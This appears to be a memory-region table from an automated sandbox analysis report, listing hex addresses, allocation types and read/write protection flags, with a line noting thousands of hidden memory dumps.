page read and write
24358FFE000
trusted library allocation
page read and write
24368481000
trusted library allocation
page read and write
243658EE000
trusted library allocation
page read and write
2435C8E0000
trusted library allocation
page read and write
2435E17B000
trusted library allocation
page read and write
243638F4000
trusted library allocation
page read and write
2434DAB0000
heap
page read and write
2435B8C2000
trusted library allocation
page read and write
2435E149000
trusted library allocation
page read and write
2434DAC1000
heap
page read and write
3910000
direct allocation
page read and write
2435C06B000
trusted library allocation
page read and write
4240000
trusted library allocation
page read and write
2435B4CD000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435BA88000
trusted library allocation
page read and write
2435C753000
trusted library allocation
page read and write
38A0000
direct allocation
page read and write
323D000
heap
page read and write
243689D1000
trusted library allocation
page read and write
24358F89000
trusted library allocation
page read and write
184C72BA000
trusted library allocation
page read and write
2435B4E2000
trusted library allocation
page read and write
2434DAD8000
heap
page read and write
2435E148000
trusted library allocation
page read and write
2434DAC7000
heap
page read and write
2435C896000
trusted library allocation
page read and write
2434DAD0000
heap
page read and write
2435DF39000
trusted library allocation
page read and write
2435E1F8000
trusted library allocation
page read and write
2BB2000
heap
page read and write
2BB2000
heap
page read and write
2434DADA000
heap
page read and write
184C7EAB000
heap
page read and write
3196000
heap
page read and write
2F90000
direct allocation
page read and write
2434DA88000
heap
page read and write
2435ED92000
trusted library allocation
page read and write
24368363000
trusted library allocation
page read and write
2435E1C7000
trusted library allocation
page read and write
2434DA7D000
heap
page read and write
2435E1FE000
trusted library allocation
page read and write
24358D6C000
trusted library allocation
page read and write
2434DA7E000
heap
page read and write
2435D4B4000
trusted library allocation
page read and write
243658CC000
trusted library allocation
page read and write
2435C739000
trusted library allocation
page read and write
1F527710000
trusted library allocation
page read and write
2435B4DE000
trusted library allocation
page read and write
2435E2C4000
trusted library allocation
page read and write
2435BA4F000
trusted library allocation
page read and write
2435EFB6000
trusted library allocation
page read and write
E3E000
stack
page read and write
24363730000
trusted library allocation
page read and write
243696E5000
heap
page read and write
243680CF000
trusted library allocation
page read and write
2435DF7C000
trusted library allocation
page read and write
2435EFFA000
trusted library allocation
page read and write
2436336A000
trusted library allocation
page read and write
2435B4E9000
trusted library allocation
page read and write
2436371E000
trusted library allocation
page read and write
24357DAD000
trusted library allocation
page read and write
2435C767000
trusted library allocation
page read and write
24365888000
trusted library allocation
page read and write
243680FA000
trusted library allocation
page read and write
184C7E38000
heap
page read and write
2435CD11000
trusted library allocation
page read and write
24365419000
trusted library allocation
page read and write
2434DACA000
heap
page read and write
295A9A80000
heap
page read and write
60A75DE000
unkown
page readonly
2435E2E3000
trusted library allocation
page read and write
2434DAC6000
heap
page read and write
2434DADA000
heap
page read and write
2435B4DE000
trusted library allocation
page read and write
243577BB000
heap
page read and write
2435EF44000
trusted library allocation
page read and write
2435E187000
trusted library allocation
page read and write
3570000
direct allocation
page read and write
2435C7A5000
trusted library allocation
page read and write
24358D60000
trusted library allocation
page read and write
2435EF7F000
trusted library allocation
page read and write
2435DF4A000
trusted library allocation
page read and write
2435E14E000
trusted library allocation
page read and write
2435ED57000
trusted library allocation
page read and write
3845000
heap
page read and write
2435C74B000
trusted library allocation
page read and write
24368361000
trusted library allocation
page read and write
24358F89000
trusted library allocation
page read and write
243681FC000
trusted library allocation
page read and write
2434DA93000
heap
page read and write
2435C7C3000
trusted library allocation
page read and write
77D000
heap
page read and write
3510000
direct allocation
page read and write
24368382000
trusted library allocation
page read and write
24358F05000
trusted library allocation
page read and write
2434DA7D000
heap
page read and write
2435DDFD000
trusted library allocation
page read and write
2434DAE1000
heap
page read and write
2B00000
heap
page read and write
2435C8E0000
trusted library allocation
page read and write
2435E1F8000
trusted library allocation
page read and write
184C7DF8000
heap
page read and write
There are 4674 hidden memdumps, click here to show them.